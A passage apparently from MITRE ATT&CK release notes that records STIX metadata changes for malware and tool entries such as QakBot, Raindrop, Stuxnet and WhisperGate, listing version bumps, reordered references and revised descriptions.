modified | 2022-11-01 18:29:13.666000+00:00 | 2023-03-02 20:43:41.287000+00:00
x_mitre_attack_spec_version | 3.0.0 | 3.1.0
x_mitre_version | 1.3 | 1.4

[S0269] QUADAGENT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-03-28 21:38:43.793000+00:00 | 2023-03-22 05:20:12.492000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0650] QakBot

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-15 21:47:13.084000+00:00 | 2023-04-14 14:37:59.896000+00:00
external_references[1]['source_name'] | Pinkslipbot | QuackBot
external_references[1]['description'] | (Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021) | (Citation: Kaspersky QakBot September 2021)
external_references[2]['source_name'] | QuackBot | Pinkslipbot
external_references[2]['description'] | (Citation: Kaspersky QakBot September 2021) | (Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)
external_references[4]['source_name'] | Trend Micro Qakbot December 2020 | Kaspersky QakBot September 2021
external_references[4]['description'] | Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021. | Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.
external_references[4]['url'] | https://success.trendmicro.com/solution/000283381 | https://securelist.com/qakbot-technical-analysis/103931/
external_references[5]['source_name'] | Red Canary Qbot | ATT QakBot April 2021
external_references[5]['description'] | Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021. | Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.
external_references[5]['url'] | https://redcanary.com/threat-detection-report/threats/qbot/ | https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot
external_references[6]['source_name'] | Kaspersky QakBot September 2021 | Red Canary Qbot
external_references[6]['description'] | Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021. | Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.
external_references[6]['url'] | https://securelist.com/qakbot-technical-analysis/103931/ | https://redcanary.com/threat-detection-report/threats/qbot/
external_references[7]['source_name'] | ATT QakBot April 2021 | Trend Micro Qakbot December 2020
external_references[7]['description'] | Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021. | Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021.
external_references[7]['url'] | https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot | https://success.trendmicro.com/solution/000283381
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New Value
x_mitre_contributors | | Inna Danilevich, U.S Bank

[S0662] RCSession

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 14:57:26.308000+00:00 | 2023-03-26 19:54:58.293000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0496] REvil

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-24 21:09:01.019000+00:00 | 2023-03-26 20:06:33.317000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[S0565] Raindrop

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)

New Description
[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)
Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-04-26 12:16:26.590000+00:00 | 2023-03-27 19:53:24.461000+00:00
description | [Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021) | [Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)
external_references[2]['source_name'] | Symantec RAINDROP January 2021 | Microsoft Deep Dive Solorigate January 2021
external_references[2]['description'] | Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021. | MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.
external_references[2]['url'] | https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware | https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
external_references[3]['source_name'] | Microsoft Deep Dive Solorigate January 2021 | Symantec RAINDROP January 2021
external_references[3]['description'] | MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021. | Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021.
external_references[3]['url'] | https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ | https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0511] RegDuke

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-10-09 16:07:59.731000+00:00 | 2023-03-24 21:24:58.468000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0125] Remsec

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
external_references | | https://securelist.com/faq-the-projectsauron-apt/75533/
dictionary_item_removed
STIX Field | Old value | New Value
external_references | http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets |
values_changed
STIX Field | Old value | New Value
modified | 2020-03-28 21:41:25.889000+00:00 | 2023-03-28 20:28:28.088000+00:00
external_references[1]['source_name'] | ProjectSauron | Kaspersky ProjectSauron Blog
external_references[1]['description'] | ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog) | Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.
external_references[2]['source_name'] | Symantec Strider Blog | ProjectSauron
external_references[2]['description'] | Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016. | ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog)
external_references[3]['source_name'] | Kaspersky ProjectSauron Blog | Symantec Strider Blog
external_references[3]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016. | Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.
external_references[3]['url'] | https://securelist.com/faq-the-projectsauron-apt/75533/ | http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0174] Responder

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_aliases | (none) | ['Responder']
values_changed
STIX Field | Old value | New value
modified | 2022-04-06 14:42:53.334000+00:00 | 2023-03-17 14:01:57.617000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0270] RogueRobin

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 18:06:39.526000+00:00 | 2023-03-22 05:24:35.812000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.1 | 2.2

[S0085] S-Type

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-30 20:10:08.347000+00:00 | 2023-03-10 16:02:05.568000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3

[S0450] SHARPSTATS

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-05-21 13:12:36.865000+00:00 | 2023-03-22 05:29:42.303000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0649] SMOKEDHAM

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-18 22:07:23.251000+00:00 | 2023-04-14 23:43:40.206000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0390] SQLRat

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 18:12:51.198000+00:00 | 2023-03-22 05:36:07.371000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0559] SUNBURST

Current version: 2.4

Version changed from: 2.3 → 2.4

Details
values_changed
STIX Field | Old value | New value
modified | 2022-07-29 19:52:40.476000+00:00 | 2023-03-27 20:01:39.552000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.3 | 2.4

[S0562] SUNSPOT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-26 12:11:19.301000+00:00 | 2023-03-27 20:02:20.344000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0382] ServHelper

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-05-29 19:31:03.708000+00:00 | 2023-04-14 23:44:24.382000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0596] ShadowPad

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-17 19:31:36.083000+00:00 | 2023-03-26 20:09:03.093000+00:00
external_references[2]['url'] | https://content.fireeye.com/apt-41/rpt-apt41 | https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0589] Sibot

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:
[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021)

New Description:
[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024).(Citation: MSTIC NOBELIUM Mar 2021)

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-18 23:33:55.403000+00:00 | 2023-03-27 19:54:34.154000+00:00
description | (see Old Description above) | (see New Description above)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0633] Sliver

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2021-10-15 15:49:25.284000+00:00 | 2023-01-17 22:14:02.852000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0603] Stuxnet

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description:
[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)

New Description:
[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-20 20:31:32.664000+00:00 | 2023-03-20 13:50:55.168000+00:00
description | (see Old Description above) | (see New Description above)
external_references[1]['description'] | (Citation: Symantec W.32 Stuxnet Dossier) | (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
external_references[4]['source_name'] | Symantec W.32 Stuxnet Dossier | Nicolas Falliere, Liam O Murchu, Eric Chien February 2011
external_references[4]['description'] | Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020. | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22
external_references[4]['url'] | https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf | https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf
external_references[5]['description'] | Ralph Langner. (2013, November). Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020. | Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3

[S0663] SysUpdate

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-15 15:03:47.435000+00:00 | 2023-03-20 16:32:21.733000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New value
x_mitre_platforms | (none) | Linux

[S0096] Systeminfo

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-12 21:29:48.567000+00:00 | 2023-03-07 13:03:30.781000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0560] TEARDROP

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:
[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)

New Description:
[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-26 12:13:17.872000+00:00 | 2023-03-27 19:55:35.688000+00:00
description | (see Old Description above) | (see New Description above)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0263] TYPEFRAME

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-06-23 20:40:40.755000+00:00 | 2023-03-26 20:22:31.288000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0665] ThreatNeedle

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-13 19:50:38.792000+00:00 | 2023-03-26 20:18:23.760000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0668] TinyTurla

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-21 16:08:09.275000+00:00 | 2023-03-26 20:20:44.580000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0678] Torisma

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-13 21:11:36.982000+00:00 | 2023-03-21 11:45:38.621000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0682] TrailBlazer

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2022-02-08 16:20:46.242000+00:00 | 2023-03-27 19:56:40.741000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[S0386] Ursnif

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2021-04-23 20:38:14.681000+00:00 | 2023-03-22 05:42:32.541000+00:00
external_references[1]['source_name'] | Ursnif | Gozi-ISFB
external_references[1]['description'] | (Citation: NJCCIC Ursnif Sept 2016) | (Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)
external_references[2]['source_name'] | Gozi-ISFB | Ursnif
external_references[2]['description'] | (Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016) | (Citation: NJCCIC Ursnif Sept 2016)
external_references[3]['source_name'] | PE_URSNIF | Dreambot
external_references[3]['description'] | (Citation: TrendMicro Ursnif Mar 2015) | (Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)
external_references[4]['source_name'] | Dreambot | PE_URSNIF
external_references[4]['description'] | (Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) | (Citation: TrendMicro Ursnif Mar 2015)
external_references[5]['source_name'] | NJCCIC Ursnif Sept 2016 | TrendMicro Ursnif Mar 2015
external_references[5]['description'] | NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019. | Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.
external_references[5]['url'] | https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif | https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992
external_references[6]['source_name'] | ProofPoint Ursnif Aug 2016 | NJCCIC Ursnif Sept 2016
external_references[6]['description'] | Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019. | NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019.
external_references[6]['url'] | https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality | https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif
external_references[7]['source_name'] | TrendMicro Ursnif Mar 2015 | ProofPoint Ursnif Aug 2016
external_references[7]['description'] | Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019. | Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.
external_references[7]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992 | https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.3 | 1.4

[S0476] Valak

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-11-23 19:00:25.745000+00:00 | 2023-03-24 21:42:31.959000+00:00
external_references[1]['source_name'] | Cybereason Valak May 2020 | Unit 42 Valak July 2020
external_references[1]['description'] | Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020. | Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
external_references[1]['url'] | https://www.cybereason.com/blog/valak-more-than-meets-the-eye | https://unit42.paloaltonetworks.com/valak-evolution/
external_references[2]['source_name'] | Unit 42 Valak July 2020 | Cybereason Valak May 2020
external_references[2]['description'] | Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020. | Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.
external_references[2]['url'] | https://unit42.paloaltonetworks.com/valak-evolution/ | https://www.cybereason.com/blog/valak-more-than-meets-the-eye
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3

[S0180] Volgmer

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-25 13:57:35.783000+00:00 | 2023-03-26 20:40:35.183000+00:00
external_references[2]['source_name'] | US-CERT Volgmer Nov 2017 | US-CERT Volgmer 2 Nov 2017
external_references[2]['description'] | US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017. | US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.
external_references[2]['url'] | https://www.us-cert.gov/ncas/alerts/TA17-318B | https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF
external_references[3]['source_name'] | US-CERT Volgmer 2 Nov 2017 | US-CERT Volgmer Nov 2017
external_references[3]['description'] | US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018. | US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.
external_references[3]['url'] | https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF | https://www.us-cert.gov/ncas/alerts/TA17-318B
external_references[4]['url'] | https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2 | https://web.archive.org/web/20181126143456/https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0689] WhisperGate

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:
[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used in attacks against Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)

New Description:
[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-24 18:47:53.298000+00:00 | 2023-04-05 20:48:07.280000+00:00
description | (see Old Description above) | (see New Description above)
x_mitre_attack_spec_version | 3.0.0 | 3.1.0
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New value
x_mitre_contributors | (none) | Matt Brenton, Zurich Global Information Security

[S0330] Zeus Panda

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2021-08-18 23:49:03.468000+00:00 | 2023-03-22 05:47:42.436000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3

[S0160] certutil

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2021-08-16 17:50:50.307000+00:00 | 2023-03-03 00:40:22.280000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3

[S0105] dsquery

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-13 13:34:53.355000+00:00 | 2023-01-04 18:56:27.812000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.3 | 1.4

[S0108] netsh

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-31 12:41:22.189000+00:00 | 2023-01-17 22:14:55.797000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

Patches

[S0137] CORESHELL

Current version: 2.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
external_references | (none) | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
dictionary_item_removed
STIX Field | Old value | New value
external_references | https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ | (none)
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 15:14:36.623000+00:00 | 2023-03-26 17:51:20.402000+00:00
external_references[2]['source_name'] | Sofacy | SOURFACE
external_references[2]['description'] | This designation has been used in reporting both to refer to the threat group ([APT28](https://attack.mitre.org/groups/G0007)) and its associated malware.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)(Citation: Securelist Sofacy Feb 2018) | (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)(Citation: Securelist Sofacy Feb 2018)
external_references[3]['source_name'] | SOURFACE | FireEye APT28 January 2017
external_references[3]['description'] | (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)(Citation: Securelist Sofacy Feb 2018) | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[4]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf | https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[5]['source_name'] | FireEye APT28 January 2017 | Securelist Sofacy Feb 2018
